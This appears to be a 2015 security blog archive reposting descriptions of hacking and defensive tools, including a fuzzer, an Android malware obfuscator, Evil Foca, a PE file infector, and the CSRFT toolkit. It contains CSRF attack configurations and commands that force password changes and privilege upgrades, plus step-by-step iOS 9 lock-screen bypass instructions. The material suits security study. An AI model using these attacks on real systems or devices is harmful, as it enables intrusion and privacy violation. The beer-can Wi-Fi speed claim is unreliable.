Affichage des articles dont le libellé est Tutorials. Afficher tous les articles
Affichage des articles dont le libellé est Tutorials. Afficher tous les articles

0d1n Open Source Web HTTP Fuzzing Tool And Bruteforcer


0d1n is a tool for automating customized attacks against web applications. This Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.

0d1n is an open source web HTTP fuzzing tool and bruteforcer. 0d1n can increase your productivity following web parameters, files, directories, forms and other things.



You can do:
  • *brute force passwords in auth forms
  • *diretory disclosure ( use PATH list to brute, and find HTTP status code )
  • *test list on input to find SQL Injection and XSS vulnerabilities


to run:

require libcurl-dev or libcurl-devel(on rpm linux based)

$ git clone https://github.com/CoolerVoid/0d1n/

need libcurl to run

$ sudo apt-get install libcurl-dev

if rpm distro

$ sudo yum install libcurl-devel

$ make

$./0d1n


Download

~ samedi 14 novembre 2015 0 commentaires

AAMO: Another Android Malware Obfuscator


AAMO: Another Android Malware Obfuscator

Set of code-obfuscation scripts tailored for Android applications. Assume that the original application can be disassembled into Smali.

Usage

$ mkdir dir_with_apks_to_obfuscate/     # fill the dir with some APKs
$ vim obfuscators/obfuscators.py

Set the obfuscator_to_apply variable to define the list of obfuscators you want to apply.

For example:

obfuscator_to_apply = [
    'Resigned',
    'Alignment',
    'Rebuild',
    'Fields',
    'Debug',
    'Indirections',
    'Defunct',
    'StringEncrypt',
    'Renaming',
    'Reordering',
    'Goto',
    'ArithmeticBranch',
    'Nop',
    'Asset',
    'Intercept',
    'Raw',
    'Resource',
    'Lib',
    'Restring',
    'Manifest',
    'Reflection']

You can choose a subset of obfuscators (recommended).

$ python obfuscators/obfuscators.py

Enjoy your obfuscated APKs.

Obfuscation Operators

Support:

Android specific

  • Repackaging
  • Reassembly
  • Re-alignment


Simple control-flow modifications

  • Junk code insertion
  • Debug symbols stripping
  • Defunct code insertion
  • Unconditional jump insertion


Advanced control-flow modifications

  • Call indirection
  • Code reordering
  • Reflection
  • Opaque predicate insertion


Renaming

  • Non-code files and resource renaming
  • Fields and methods renaming
  • Package renaming


Encryption

  • Resource encryption (asset files)
  • Native code encryption
  • Data encryption (strings)


~ vendredi 13 novembre 2015 0 commentaires

WhatsApp Bot Seed: A Small Python Framework To Create A WhatsApp Bot Like A Web Framework


A small python framework to create a whatsapp bot, with regex-callback message routing (just like a web framework).

What it does?

Basic message handling:
Example


Automatic media (images and videos) download, and url print screens
Example


Youtube Video Downloads, and Text to Speech
Example


Google image and web search
Example


Group administration
Example



Installation

  • Install the image handling system dependencies on bash opt/system-requirements.sh
  • Create a virtualenv and install the requirements pip install -r opt/requirements.pip
  • Follow the instructions on src/config.py to get the whatsapp credentials.
  • Then just run the server with python src/server.py


To create your own views, check the src/router.py, and the src/view/basic_views.py for a simple example.

Download

~ mercredi 28 octobre 2015 0 commentaires

Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook For A Limited Time


Mobile Security: How to Secure, Privatize, and Recover Your Devices (A $26.99 Value!) Free eBook for a limited time

Learn how to keep your data secure when you’re on the go.

Mobile phones and tablets enhance our lives, but they also make you and your family vulnerable to cyber-attacks or theft. This clever eBook will help you secure your devices and know what to do if the worst happens.


Download

~ jeudi 22 octobre 2015 0 commentaires

LiME Linux Memory Extractor

LiME ~ Linux Memory Extractor

A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

  • Features
  • Usage
  • Examples
  • Presentation

Features

  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint


Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=> format= [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now on the host machine, we can establish the connection and acquire memory using netcat

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"


Download

~ mercredi 21 octobre 2015 0 commentaires

How To Boost Your Wi-Fi Signal With Beer Can



How To Boost Your Wi-Fi Signal With Beer Can?

Have you ever think that your Beer Can boost your Wi-Fi Signal.

Here is the Steps:

  1. Take Beer can
  2. Wash out to clean the Can
  3. Cut the Can Bottom around.
  4. Now repeat the process on top of the Can and leave 1 and 2 inch space some space.
  5. Place it Over Routers Antenna
  6. Now Wi-Fi signals is boosting 2x-4x speed through Beer Can.
  7. Beer Can Aluminium reacts as Reflector.
  8. Now ping your Wi-Fi Speed to check your booster signals.


Check this Video:


~ mardi 20 octobre 2015 0 commentaires

Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide (a $35.99 value) Free


"Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide (a $35.99 value) Free!"

Learn to perform professional penetration testing for high-secured environments with this intensive hands-on guide.

Advanced Penetration Testing for Highly Secured Environments provides step-by-step instructions on how to emulate a highly secured environment on your own equipment using VirtualBox, pfSense, snort, and similar technologies. This enables you to practice what you have learned throughout the book in a safe environment.

You will also get a chance to witness what security response teams may see on their side of the penetration test while you are performing your testing!

This free offer won't be available for very long,

Offered Free by: PackT Publishing

Download

~ mardi 13 octobre 2015 0 commentaires

How To Test Security in IPv4 and IPv6 Data Networks?


How To Test Security in IPv4 and IPv6 Data Networks ?

Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. 

Compared to IPv4 address space is 32 bits which resulting 4 billion addresses.IPv6 offers larger address space. Its addresses are 128 bits long, resulting in an address space of 340 undecillion addresses.


In addition, IPv6 provides other technical benefits, particularly, it permits hierarchical address allocation methods that facilitate route aggregation across the Internet, and thus limit the expansion of routing tables. The use of multicast addressing is expanded and simplified, and provides additional optimization for the delivery of services. Device mobility, security, and configuration aspects have been considered in the design of the protocol.

The tool is capable of carrying out various attacks such as:


  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.


The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Man In The Middle (MITM) attack

The well-known “Man In The Middle” is an attack in which the wrongdoer creates the possibility of reading, adding, or modifying information that is located in a channel between two terminals with neither of these noticing. Within the MITM attacks in IPv4 and IPv6 Evil Foca considers the following techniques:

ARP Spoofing: Consists in sending ARP messages to the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP of another device. Any traffic directed to the IP address of the predetermined link gate will be erroneously sent to the attacker instead of its real destination.

DHCP ACK Injection: Consists in an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify its behavior. Evil Foca converts the machine in a fake DHCP server on the network.

Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, with the difference being in that IPv6 doesn’t work with the ARP protocol, but that all information is sent through ICMPv6 packets. There are five types of ICMPv6 packets used in the discovery protocol and Evil Foca generates this type of packets, placing itself between the gateway and victim.

SLAAC attack: The objective of this type of attack is to be able to execute an MITM when a user connects to Internet and to a server that does not include support for IPv6 and to which it is therefore necessary to connect using IPv4. This attack is possible due to the fact that Evil Foca undertakes domain name resolution once it is in the communication media, and is capable of transforming IPv4 addresses in IPv6.

Fake DHCPv6 server: This attack involves the attacker posing as the DCHPv6 server, responding to all network requests, distributing IPv6 addresses and a false DNS to manipulate the user destination or deny the service.

Denial of Service (DoS) attack: The DoS attack is an attack to a system of machines or network that results in a service or resource being inaccessible for its users. Normally it provokes the loss of network connectivity due to consumption of the bandwidth of the victim’s network, or overloads the computing resources of the victim’s system.

DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists in associating a nonexistent MAC address in a victim’s ARP table. This results in rendering the machine whose ARP table has been modified incapable of connecting to the IP address associated to the nonexistent MAC.
DoS attack in IPv6 with SLAAC attack: In this type of attack a large quantity of “router advertisement” packets are generated, destined to one or several machines, announcing false routers and assigning a different IPv6 address and link gate for each router, collapsing the system and making machines unresponsive.

DNS Hijacking: The DNS Hijacking attack or DNS kidnapping consists in altering the resolution of the domain names system (DNS). This can be achieved using malware that invalidates the configuration of a TCP/IP machine so that it points to a pirate DNS server under the attacker’s control, or by way of an MITM attack, with the attacker being the party who receives the DNS requests, and responding himself or herself to a specific DNS request to direct the victim toward a specific destination selected by the attacker.

Download

~ mardi 29 septembre 2015 0 commentaires

Exclusive Enterprise Security Kit (a $26.99 value) FREE For A Limited Time


Exclusive Enterprise Security Kit (a $26.99 value) FREE for a limited time!

Kit includes “Enterprise Security: A Data-Centric Approach to Securing the Enterprise” plus 3 other resources to help you understand how to secure enterprise data.

Download this exclusive kit and you'll get sample forms and process flows, solutions to enterprise information security challenges, and a glimpse into the roadmap to success. You'll also receive an easy-to-follow reference for implementing information security in the enterprise.

This kit is important for decision makers as new business models are developed and enterprise security becomes increasingly important.

The following kit contents will help you continue your research on Enterprise Security:

  • Enterprise Security: A Data-Centric Approach
  • Detecting DDoS: Attacks with Infrastructure Monitoring
  • Best Practices for Public Cloud Security
  • 15 Steps to Reducing Security Risks in Business Mobility


~ lundi 28 septembre 2015 0 commentaires

How To Hack iPhone To See Photos and Contacts Just in 30 Seconds


How To Hack iPhone ?
To See Photos and Contacts Just in 30 Seconds!

A new method to unlock a iPhone, iPad or iPod touch running on latest iOS 9 and iOS 9.1. The vulnerability has been discovered to access the device contacts and photos within 30 sec.

How to do unlock for iOS 9?

  • Type incorrect password 4 times 
  • For the fifth time Type the password 3 times and in 4th time hold the HOME button to invoke SIRI by the 4th digit.
  • Now ask the siri about the Time.
  • Tap the Clock icon to open the Clock app and add a new Clock, then write anything in the Choose a City field.
  • Now double tap on the word to select, you wrote to invoke the copy & paste menu, Select All and then click on "Share".
  • Tap the 'Message' icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
  • Select "Create New Contact," and Tap on "Add Photo" and then on "Choose Photo".
  • You'll now be able to see the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.


Watch Video for bypass iOS 9 Lockscreen



After this bypass attack Apple have been updated new version iOS 9.0.1 but its still we can bypass its lockscreen.

Look below Video demonstrate:

Video for bypass iOS 9.0.1 Lockscreen



How To prevent by this attack?

Until Apple fixes this issue, iOS users can protect themselves by disabling Siri on the lock screen

  • Go to Settings > Touch ID & Passcode > Siri
  • Turn off Siri

Just few days back Biggest Security Breach In Apple App Store Gets Malware Infected.

~ 0 commentaires

How To Detect Potentially Malicious PHP Files


How To Detect Potentially Malicious PHP Files ?

Here is the tool called PHP-malware-finder by nbs-system


What does it detect?

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.

The following list of encoders/obfuscators/webshells are also detected:

  • Best PHP Obfuscator
  • Carbylamine
  • Cipher Design
  • Cyklodev
  • Joes Web Tools Obfuscator
  • Php Obfuscator Encode
  • SpinObf
  • Weevely3
  • atomiku
  • cobra obfuscator
  • phpencode
  • webtoolsvn

How does it work?

Detection is performed by crawling the filesystem and testing files against a set of YARA rules. Yes, it's that simple!

How to use it?

$ ./phpmalwarefinder -h
Usage phpmalwarefinder [-cfhw] ...
    -c  Optional path to a configuration file
    -f  Fast mode
    -h  Show this help message
    -v  Verbose mode

Or if you prefer to use yara:

$ yara -r ./malwares.yara /var/www

Download

~ jeudi 24 septembre 2015 0 commentaires

PEinjector - MITM Portable Executable (PE) File Infector



PEinjector - MITM Portable Executable (PE) File Infector

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. 

It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features


  • Full x86 and x64 PE file support.
  • Open Source
  • Fully working on Windows and Linux, including automated installation scripts.
  • Can be operated on embedded hardware, tested on a Rasperberry Pi 2.
  • On Linux, all servers will be automatically integrated as service, no manual configuration required.
  • Plain C, no external libraries required (peinjector).
  • MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
  • Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
  • Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.


peinjector
Provides PE file patching as a service. Just send the raw header of your PE file and you’ll receive a custom-made patch for it. Can be remotely controlled via a command protocol.

peinjector-control
Web interface to configure and control a peinjector server. A small shellcode factory with some basic shellcodes, automatic encryptoin/obfuscation and thread generation is provided - alternatively, custom shellcode can be injected.

peinjector-interceptor
Sample MITM integration. Based on Python and libmproxy, supports SSL interception, can act as transparent Proxy, HTTP Proxy, ... . Provides seamless PE patching capabilities.



~ lundi 21 septembre 2015 0 commentaires

NowSecure Developed Android Vulnerability Test Suite For Recent Devices


NowSecure Developed Android Vulnerability Test Suite For Recent Devices.

Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security. NowSecure presents an on-device app to test for recent device vulnerabilities.

This tool was meant to show the end user the attack surface that a given device is susceptible to. In implementing these checks we attempt to minimize or eliminate both false positives/false negatives without negatively affecting system stability.

Rationale for necessity

When a vulnerability is discovered, Google receives word and applies a patch to Android. The Nexus devices are usually the devices that receive these patches quickest as they deviate the least (read: not at all) from AOSP (Android Open Source Project - The core of Android, where Google commits to). The lag time between learning about a bug and the time when a patch is applied to a device can still be significant (for OEMs, it can be > 1 year or never). For example, the futex bug (CVE-2014-3153/Towelroot) was known about in late May, early June. This bug took multiple months to get patched on the flagship (at the time) Nexus 5. This leaves users extremely vulnerable to attack from applications. Users mostly do not know that their devices are vulnerable and this tool is meant to give visibility into the vulnerabilities a given device is susceptible to.

Lifecycle of a patch

Samsung, HTC, and every other OEM keep heavily customized versions of Android. The patch deployment infrastructure from OEMS -> carriers -> users is in disarray. The OEMs receive the patches from Google and spend weeks or months applying these to some devices and testing. Then they ship off the device updates to the carrier who is responsible for pushing them to the end user. They then go through another QA cycle from the carrier.

Implementation

Vulnerabilities in a device can exist at many layers inside of Android. For example, a bug can exist in the kernel (Towelroot, for example) or it can exist in the Android specific framework (Android Masterkeys/FakeID). Some of the kernel bugs can sometimes be difficult to check for without potentially causing system instability. This implementation takes care to not include checks that could cause instability problems for the end user and therefore may omit checks that could cause these types of issues. The framework is very thin at the current time and consists of a vector of vulnerability checks. Their concrete implementations vary wildly depending on the bug.

Download

~ dimanche 20 septembre 2015 0 commentaires

CSRFT - Cross Site Request Forgeries Web Vulnerabilities (Exploitation) Toolkit


CSRFT - Cross Site Request Forgeries Web Vulnerabilities (Exploitation) Toolkit

Description

This project has been developed to exploit CSRF Web vulnerabilities and provide you a quick and easy exploitation toolkit. In few words, this is a simple HTTP Server in NodeJS that will communicate with the clients (victims) and send them payload that will be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.
*However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoC (Proof Of Concepts) really easily. Let's see how to get/use it.

How to get/use the tool

First, clone it :

$ git clone git@github.com:PaulSec/CSRFT.git

To make this project work, get the latest Node.js version here. Go in the directory and install all the dependencies:

npm install

Then, launch the server.js :

$ node server.js

Usage will be displayed :

Usage : node server.js

More information

By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080.
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.

The index page displayed on the browser is accessible via : /views/index.ejs.
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?

The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :


  • conf folder : add your JSON configuration file with your configuration. 
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionnaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server


Configuration file templates

GET Request with special value

Here is a basic example of JSON configuration file that will target www.vulnerable.com This is a special value because the malicious payload is already in the URL/form.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "method": "GET", 
            "type_attack": "special_value", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
          }
        ]
      }
    ]
  }
}

GET Request with dictionary attack

Here is a basic example of JSON configuration file. For every entry in the dictionnary file, there will be a HTTP Request done.

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "file": "./dicos/passwords.txt", 
            "method": "GET", 
            "type_attack": "dico", 
            "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
          }
        ]
      }
    ]
  }
}

POST Request with special value attack

{
  "audit": {
    "name": "PoC done with Automatic Tool", 
    "scenario": [
      {
        "attack": [
          {
            "form": "/tmp/csrft/form.html", 
            "method": "POST", 
            "type_attack": "special_value"
          }
        ]
      }
    ]
  }
}

The form already includes the malicious payload. So it just has to be executed by the victim.

I hope you understood the principles. I didn't write an example for a POST with dictionary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?

A scenario is composed of attacks. Those attacks can be simultaneous or at different time.

For example, you want to sign the user in and THEN, you want him to perform some unwanted actions. You can specify it in the JSON file.

Let's take an example with both POST and GET Request :

{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },          
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ] 
            }   
        ]
    }
}

You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand

Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can but it shoudn't be this complicated.

Steps to succeed :

1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do Dictionary attack, add your dictionary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json

B) I want to automate attacks really easily

To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.

Here are some basic use cases :

*GET parameter with Dictionnary attack : *

$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
*POST parameter with Special value attack : *

$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value


~ jeudi 10 septembre 2015 0 commentaires

ezbash: A Tool That Teaches How To Use The Terminal


ezbash: A Tool That Teaches How To Use The Terminal

ezbash (yes, it's uncapitalized on purpose) is a tool created to help people ease their way into using the MacOS or Linux terminal, that most powerful of applications.

Installation

As your first step into learning bash, enter this into your terminal:

gem install ezbash

Note: You may have to tack "sudo" onto the begining of the above command to get the program to install. If you get an error code like "Permision denied", you will need to do this.

Usage

To run the application, enter this into the terminal:

ezbash

Then, list possible commands by entering "help" and get started! Have fun!

Uninstallation

To uninstall the program, enter this into your terminal:

gem uninstall ezbash


Download

~ vendredi 7 août 2015 0 commentaires

KdExploitMe: A Kernel Driver To Practice Writing Exploits


KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. 

Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, this driver in the hopes that you will use this knowledge for good.

Download

~ jeudi 6 août 2015 0 commentaires

Untethered Jailbreak Your iOS 8.4 Devices Including MAC Version Available


Untethered Jailbreak Your iOS 8.4 Devices Including MAC Version Available

The chinese website TaiG released jailbreak for Mac latest version iOS 8.4 jailbreak for iOS 8.4. iPhone 6, 6 Plus, 5s, 5c, 5, 4s, all iPads and iPod touches are supported. 

What is Jailbreak?
iOS jailbreaking is the process of removing the limitations on Apple devices running the iOS operating system through the use of software and hardware exploits – such devices include the iPhone, iPod touch, iPad, and second generation Apple TV. Jailbreaking permits root access to the iOS operating system, allowing the download of additional applications, extensions, and themes that are unavailable through the official Apple App Store.

How can you Jailbreak?

  • Download and install TaiG
  • Turn off your passcode (Settings > Passcode > Turn Passcode Off) and Find My iPhone (Settings > iCloud > Find My iPhone)
  • Plug in your phone to your computer, close iTunes (if it opened) and open the TaiG app
  • Start to jailbreak. Open TaiG Jailbreak Tool, and have your device connected to your computer.
  • Wait for TaiG to recognize your device, then uncheck the 3K assistant option
  • Click Start and wait for the software to jailbreak your device.

-> Backup your data before Jailbreak

TaiG Jailbreak V2.4.3 supports iOS 8.1.3-iOS 8.4 untethered jailbreak. Currently iOS 8.4 is relatively stable. So we strongly recommend you to update your device to iOS 8.4 with TaiG Pro before jailbreak.

Download Taig Jailbreak Tool


~ mercredi 5 août 2015 0 commentaires

HORNET Worlds Fastest Encrypted Browser With 93 Gbps High Speed Than TOR




HORNET Worlds Fastest And Privacy Browser With 93 Gbps High Speed Rather Than TOR

"High Speed Onion Routing At The Network Layer" HORNET, which allows encrypting browsing like TOR. HORNET added more security layers with fastest standard browsers. 

And its developed by five researchers from UK, USA and Switzerland.

Hornet developers said that its browser is the most fastest with more security level than TOR. Tor network, which handles over 2 Million user on its network daily. While surfing TOR its slow and using to hide a user's IP address. HORNET developers found the weakness of TOR and lessen the cryptography work needed from each level.

However, Tor already suffered from Cyber attack recently.

According to HORNET PDF,

"We present Hornet, a system that enables high-speed end-to-end anonymous channels by leveraging next-generation network architectures," write the authors of the paper. "Hornet is designed as a low-latency onion routing system that operates at the network layer, thus enabling a wide range of applications"

“HORNET is designed to be highly efficient,” researchers said. Without sacrificing security, the network supports data transfer speeds of up to 93GBps and can be scaled at little cost.

Specifically, our contributions are the following:

• We design and implement HORNET, an anonymity system that uses source-selected paths and shared keys between endpoints and routers to support onion routing. Unlike other onion routing implementations, HORNET routers do not keep per-flow state or perform computationally expensive operations for data forwarding, allowing the system to scale as new clients are added.

• We analyze the security of our system, showing that it can defend against passive attacks, and certain types of active attacks. Our system provides stronger security guarantees than existing network-level anonymity systems.

• We evaluate the performance of our system, showing that anonymous data processing speed is comparable to that of LAP and Dovetail (up to 93.5 Gb/s on a 120 Gb/s software router). Each HORNET node can process traffic for a practically unlimited number of sources.




~ jeudi 30 juillet 2015 0 commentaires

Who's Using Cyber Threat Intelligence And How ?





"Who's Using Cyber Threat Intelligence And How" ?

In the last several years, we've seen a disturbing trend--attackers are innovating much faster than defenders are.

We've seen the “commercialization” of malware, with attack kits available on underground forums for anyone who wants to perpetrate a variety of attacks. Large Botnets are available for rent, allowing attackers to send spam or launch DDoS attacks at will.

Many attackers reuse malware and command and control protocols and methods, adapting their “products” over time to keep ahead of the anti-malware industry and security professionals. As more and more attacks occur, however, the likelihood increases that some organization or group has seen the attack before.

Offered Free by: ThreatStream

Free Download now



~ vendredi 24 juillet 2015 0 commentaires

WATOBO- The Web Application Security Auditing Toolbox For XSS, LFI And SQL Injections




WATOBO- The Web Application Security Auditing Toolbox

WATOBO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.

It is competent to the discovery of common vulnerabilities like (XSS, LFI, SQL injections etc) in web applications.

Most important features:

  • WATOBO has Session Management capabilities! You can define login scripts as well as logout signatures. So you don’t have to login manually each time you get logged out.
  • WATOBO can act as a transparent proxy (requires nfqueue)
  • WATOBO can perform vulnerability checks out of the box
  • WATOBO can perform checks on functions which are protected by Anti-CSRF-/One-Time-Tokens
  • WATOBO supports Inline De-/Encoding, so you don’t have to copy strings to a transcoder and back again. Just do it inside the request/response window with a simple mouse click.
  • WATOBO has smart filter functions, so you can find and navigate to the most interesting parts of the application easily.
  • WATOBO is written in (FX)Ruby and enables you to easily define your own checks
  • WATOBO runs on Windows, Linux, MacOS ... every OS supporting (FX)Ruby
  • WATOBO is free software ( licensed under the GNU General Public License Version 2)


Installation on Windows
c:\> gem install watobo
This might take some time ...

To start watobo enter
c:\> watobo_gui 


Installation on Kali Linux
WATOBO is included in the official Kali Linux repo. You can install it by
apt-get install watobo



~ samedi 4 juillet 2015 0 commentaires